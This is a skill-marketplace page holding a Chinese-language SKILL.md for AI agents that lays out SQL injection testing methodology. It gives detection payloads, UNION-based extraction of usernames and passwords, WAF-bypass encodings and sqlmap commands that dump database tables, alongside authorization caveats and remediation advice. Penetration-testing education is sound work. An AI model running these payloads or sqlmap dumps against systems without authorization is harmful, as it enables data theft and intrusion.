ed1s0nz/sql-injection-testing
skills/sql-injection-testing/SKILL.md
SQL注入测试的专业技能和方法论
$ install --global
skillsauthnpx skillsauth add ed1s0nz/cyberstrikeai sql-injection-testingInstall this skill globally with one command. Works with Claude Code, Cursor, and Windsurf.
Security Scan Results
3 of 9 scanners reported clean
Some scanners were skipped, did not run, or reported a non-clean status. Review each row below.
3
Scanners Passed
9
Scanners in report
Clean
TrivyContainer and dependency vulnerability scanner
95%
Clean
SemgrepStatic code analysis for vulnerabilities
95%
Clean
mcp-scan (Snyk)Model Context Protocol security validation
95%
Skipped
Snyk (dep)Open source security scanning
50%
Skipped
Socket.devSupply chain security analysis
50%
Skipped
VirusTotalMulti-engine malware detection
50%
Skipped
CrowdStrikeAdvanced threat intelligence
50%
Skipped
OSV-ScannerOpen Source Vulnerability database check
50%
Skipped
OWASP Dep-Check
50%
Last scanned: Apr 15, 2026, 5:24 PM11.0s1 file scanned
SKILL.md
- name:
- sql-injection-testing
- description:
- SQL注入测试的专业技能和方法论
- version:
- 1.0.0
SQL注入测试技能
概述
SQL注入是一种常见且危险的Web应用漏洞。本技能提供了系统化的SQL注入测试方法、检测技术和利用策略。
测试方法
1. 参数识别
- 识别所有用户输入点:URL参数、POST数据、HTTP头、Cookie等
- 重点关注:id、search、filter、sort等参数
- 使用Burp Suite或类似工具拦截和修改请求
2. 基础检测
- 单引号测试:
'- 查看是否出现SQL错误 - 布尔盲注:
' AND '1'='1vs' AND '1'='2 - 时间盲注:
' AND SLEEP(5)-- - 联合查询:
' UNION SELECT NULL--
3. 数据库识别
- MySQL:
' AND @@version LIKE '%mysql%'-- - PostgreSQL:
' AND version() LIKE '%PostgreSQL%'-- - MSSQL:
' AND @@version LIKE '%Microsoft%'-- - Oracle:
' AND (SELECT banner FROM v$version WHERE rownum=1) LIKE '%Oracle%'--
4. 信息提取
- 数据库名:
' UNION SELECT database()-- - 表名:
' UNION SELECT table_name FROM information_schema.tables-- - 列名:
' UNION SELECT column_name FROM information_schema.columns WHERE table_name='users'-- - 数据提取:
' UNION SELECT username,password FROM users--
工具使用
sqlmap
# 基础扫描
sqlmap -u "http://target.com/page?id=1"
# 指定参数
sqlmap -u "http://target.com/page" --data="id=1" --method=POST
# 指定数据库类型
sqlmap -u "http://target.com/page?id=1" --dbms=mysql
# 获取数据库列表
sqlmap -u "http://target.com/page?id=1" --dbs
# 获取表
sqlmap -u "http://target.com/page?id=1" -D database_name --tables
# 获取数据
sqlmap -u "http://target.com/page?id=1" -D database_name -T users --dump
手动测试
- 使用Burp Suite的Repeater模块
- 使用浏览器开发者工具
- 编写Python脚本自动化测试
绕过技术
WAF绕过
- 编码绕过:URL编码、Unicode编码、十六进制编码
- 注释绕过:
/**/,--,# - 大小写混合:
SeLeCt,UnIoN - 空格替换:
/**/,+,%09(Tab),%0A(换行)
示例
原始:' UNION SELECT NULL--
绕过1:'/**/UNION/**/SELECT/**/NULL--
绕过2:'%55nion%20select%20null--
绕过3:'/*!UNION*//*!SELECT*/null--
验证和报告
验证步骤
- 确认可以执行SQL语句
- 提取数据库信息验证
- 评估影响范围(数据泄露、权限提升等)
- 记录完整的POC(请求/响应)
报告要点
- 漏洞位置和参数
- 影响的数据和系统
- 完整的利用步骤
- 修复建议(参数化查询、输入验证等)
注意事项
- 仅在授权测试环境中进行
- 避免对生产数据造成破坏
- 谨慎使用DROP、DELETE等危险操作
- 记录所有测试步骤以便复现
Related Skills
ed1s0nz/cyberstrike-eino-demo
tools
VerifiedTrustedCommunity
满配示例技能包:SKILL.md + scripts/、references/、assets/ 等可选目录;验证 Eino skill 与 HTTP 包内路径(仅授权安全测试与教学)。
3,393SKILL.mdUpdated Apr 21, 2026
ed1s0nz/xxe-testing
testing
VerifiedTrustedCommunity
XXE XML外部实体注入测试的专业技能和方法论
3,309SKILL.mdUpdated Apr 15, 2026
ed1s0nz/xss-testing
testing
VerifiedTrustedCommunity
XSS跨站脚本攻击测试的专业技能
3,309SKILL.mdUpdated Apr 15, 2026
ed1s0nz/xpath-injection-testing
testing
VerifiedTrustedCommunity
XPath注入漏洞测试的专业技能和方法论
3,309SKILL.mdUpdated Apr 15, 2026